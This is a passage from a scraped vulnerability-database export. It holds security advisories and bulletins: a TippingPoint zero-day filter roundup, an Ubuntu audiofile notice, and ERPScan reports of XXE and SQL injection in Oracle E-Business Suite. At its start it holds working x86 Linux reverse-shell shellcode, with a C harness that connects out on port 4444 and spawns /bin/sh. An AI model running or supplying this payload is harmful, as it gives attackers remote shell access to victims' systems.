\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; now we look like: execve(\"//bin/sh,0x00000000\", *\"//bin/sh,0x00000000\", 0x00000000);\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; loading syscall execve\r\nmov al, 0x0B ; syscall for execve is 11 dec / 0x0B hex\r\nint 0x80\r\n \r\n*/\r\n \r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\n//compile with: gcc shellcode.c -o shellcode -fno-stack-protector -z execstack\r\n \r\nunsigned char code[] = \\\r\n\"\\x31\\xc0\\x50\\x6a\\x01\\x6a\\x02\\x89\\xe1\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\xcd\\x80\\x96\\x31\\xd2\\x52\\xc6\\x04\\x24\\x0a\\xc6\\x44\\x24\\x02\\x07\\xc6\\x44\\x24\\x03\\x11\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89\\xe1\\x43\\x43\\x31\\xc0\\xb0\\x66\\xcd\\x80\\x89\\xf3\\x31\\xc9\\xb1\\x03\\x31\\xc0\\xb0\\x3f\\xfe\\xc9\\xcd\\x80\\x75\\xf6\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\r\n \r\nmain()\r\n{\r\n printf(\"Shellcode Length: %d\\n\", strlen(code));\r\n int (*ret)() = (int(*)())code;\r\n ret();\r\n}\n\n# 0day.today [2018-05-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30438"}], "trendmicroblog": [{"lastseen": "2018-03-09T14:52:04", "bulletinFamily": "blog", "cvelist": [], "description": "![](https://blog.trendmicro.com/wp-content/uploads/2017/08/TippingPoint-300x205.jpg)\n\nPwn2Own 2018 is coming up in a couple of weeks and I am excited to see what interesting vulnerabilities will pop up at the contest. I attempted to explain the contest to my mom, and in the simplest terms, I told her that Pwn2Own is a contest where contestants are rewarded for breaking something. It\u2019s not as basic as me beating up a printer with a baseball bat - which I have done, by the way, paying homage to the 1999 movie Office Space.\n\nIt\u2019s about breaking something, in this case, finding vulnerabilities in software, with the ultimate goal of making the software better.\n\nAttackers are always adapting their ways of exploiting vulnerabilities and the good guys out there are adapting with them to make sure they\u2019re not successful. At last year\u2019s event, we saw the first virtual machine escapes in contest history. For this year\u2019s contest, virtualization targets are on the list and we welcome VMWare as a sponsor. Microsoft isn\u2019t only a target in the enterprise application category, they have joined us as our partner in this year\u2019s contest.\n\nFor more information on the upcoming contest, complete rules, and how to enter the contest, visit <https://www.zerodayinitiative.com/blog/2018/1/25/pwn2own-returns-for-2018-partners-with-microsoft-and-sponsored-by-vmware>.\n\nRegistration for the contest participation closes at 5pm Pacific Time on March 5, 2018. For the latest updates, follow the Zero Day Initiative on Twitter at [@thezdi](<https://twitter.com/thezdi>).\n\n**Zero-Day Filters**\n\nThere are 21 new zero-day filters covering five vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Adobe (13)_**\n\n| \n\n * 30436: ZDI-CAN-5455: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30437: ZDI-CAN-5456: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30438: ZDI-CAN-5457: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30440: ZDI-CAN-5463: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30441: ZDI-CAN-5464: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30442: ZDI-CAN-5465: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30443: ZDI-CAN-5466: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30446: ZDI-CAN-5467: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30447: ZDI-CAN-5468: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30448: ZDI-CAN-5469: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30449: ZDI-CAN-5470: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30451: ZDI-CAN-5474: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30452: ZDI-CAN-5475: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC) \n---|--- \n| \n \n**_Foxit (2)_**\n\n| \n\n * 30450: ZDI-CAN-5471: Zero Day Initiative Vulnerability (Foxit Reader)\n * 30470: ZDI-CAN-5488: Zero Day Initiative Vulnerability (Foxit Reader) \n---|--- \n| \n \n**_OMRON (3)_**\n\n| \n\n * 30432: ZDI-CAN-5453: Zero Day Initiative Vulnerability (OMRON CX-One)\n * 30435: ZDI-CAN-5454: Zero Day Initiative Vulnerability (OMRON CX-One)\n * 30439: ZDI-CAN-5462: Zero Day Initiative Vulnerability (OMRON CX-One) \n---|--- \n| \n \n**_SAP (1)_**\n\n| \n\n * 30467: ZDI-CAN-5478: Zero Day Initiative Vulnerability (SAP MaxDB) \n---|--- \n| \n \n**_WECON (2)_**\n\n| \n\n * 30468: ZDI-CAN-5480: Zero Day Initiative Vulnerability (WECON LeviStudio)\n * 30469: ZDI-CAN-5481,5482: Zero Day Initiative Vulnerability (WECON LeviStudio) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-february-19-2018/>).\n\nThe post [TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of February 26, 2018](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-february-26-2018/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2018-03-02T16:22:09", "published": "2018-03-02T16:22:09", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-february-26-2018/", "id": "TRENDMICROBLOG:A715FAD0A825855D84E1660AAE1BFF8B", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of February 26, 2018", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions (afamexts.sql) does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password (for example,\r\ndefault password APPS/APPS), he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4851"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-030]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with 